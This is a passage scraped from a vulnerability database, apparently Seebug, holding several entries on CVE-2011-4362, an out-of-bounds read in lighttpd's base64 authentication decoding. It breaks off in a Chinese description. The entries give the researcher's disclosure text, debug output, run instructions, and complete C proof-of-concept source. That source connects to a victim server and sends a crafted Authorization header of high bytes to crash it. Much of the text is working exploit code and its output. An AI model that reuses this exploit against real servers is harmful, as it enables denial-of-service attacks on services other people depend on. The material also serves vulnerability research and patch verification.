\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n \r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n \r\nHow to run this very primitive Proof of Concept?\r\n \r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n Usage: ./p_cve-2011-4362 <options>\r\n \r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n \r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n \r\n [+] Check the website!\r\n \r\n$\r\n \r\nLighttpd will log this situation probably in error-log file like this:\r\n \r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd ]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n \r\n--- CUT ---\r\n \r\nMaybe you can find vulnerable binary?\r\n \r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n \r\n \r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30003", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:25:09", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "lighttpd Denial of Service Vulnerability PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72453", "id": "SSV:72453", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n?Yg\\???n?Xt?]rze???gY??\\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp?\t]???\\???@V??x???ize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:56:15", "description": "No description provided by source.", "cvss3": {}, "published": "2011-12-27T00:00:00", "type": "seebug", "title": "Lighttpd 1.4.30 / 1.5 Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2011-12-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26120", "id": "SSV:26120", "sourceData": "\n /*\r\n *Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * ...\r\n * int ch, ...;\r\n * size_t i;\r\n * ...\r\n * \r\n * ch = in[i];\r\n * ...\r\n * ch = base64_reverse_table[ch];\r\n * ...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\nchar header_port[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s:%d\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\t\\t[+] Preparing arguments... ");\r\n while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf("Gethostbyname() field!\\n");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf("malloc() :(\\n");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf("OK\\n\\t\\t[+] Creating socket... ");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf("Socket() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Connecting to [%s]... ",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf("Connect() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Sending dirty packet... ");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf("OK\\n\\n\\t\\t[+] Check the website!\\n\\n");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n",arg);\r\n printf("\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n");\r\n exit(0);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26120", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:45", "description": "CVE-2011-4362\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\nlighttpd\u5728\u8ba4\u8bc1\u6570\u636e\u7684\u89e3\u7801\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nhttp_auth.c\u4e2d\u7684\u4ee3\u7801\u5728base64\u89e3\u7801\u7528\u6237\u8f93\u5165\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u4f7f\u7528"const char *in"\u7c7b\u578b\uff0c\u5e76\u5c06\u6bcf\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a"int ch"\u4f5c\u4e3a\u6620\u5c04\u8868\u7684\u7d22\u5f15\uff0c\u5927\u4e8e0x80\u7684\u5b57\u7b26\u5c31\u4f1a\u5bfc\u81f4\u8d1f\u7d22\u5f15\uff0c\u53ef\u80fd\u9020\u6210\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u3002\r\n\r\nlighttpd 